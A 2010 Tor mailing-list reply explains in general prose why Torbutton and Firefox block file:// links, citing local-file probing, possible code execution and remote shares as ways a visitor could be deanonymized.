--- On Wed, 2/17/10, Jon Cosby <[email protected]> wrote:
>
> I'm referring to links from file:// urls. By default,
> Torbutton blocks this, and has it "recommended."
Ah, you mean the file protocol. Firefox itself tends to have this disabled by
default also. One of the reasons is to prevent malicious users from including
file:// urls in an external webpage. With file:// urls, a webpage could be
designed to test for the existence of local files on your computer. From an
anonymity standpoint, if I can run a test that verifies the existence of a
specific file on your computer, one that I can prove only you would have on
your computer, then I might be able to prove that you loaded my webpage.
I suspect there are also ways potentially execute some local code on your
computer by accessing local files (depending on the OS, this might be harder or
easier to achieve). If that's the case, perhaps depending on the program, by
executing it locally, I might be able to detect this remotely. Maybe the
program does something as simple as a DNS lookup that I can sniff and then
correlate to you...
And, finally, just because a file is accessed via a file:// url does not mean
it is actually accessing a file locally. It is accessing a file via your local
file system namespace, but this might be on a remotely mounted drive/share
making the remote server able to detect/prove this access, once again, exposing
your access of a webpage by at least the owner of the remote server/share.
I suspect that there are many more attacks based on this, that I have only
touched the tip of the iceberg... Hope that helps,
-Martin
***********************************************************************
To unsubscribe, send an e-mail to [email protected] with
unsubscribe or-talk in the body. http://archives.seul.org/or/talk/
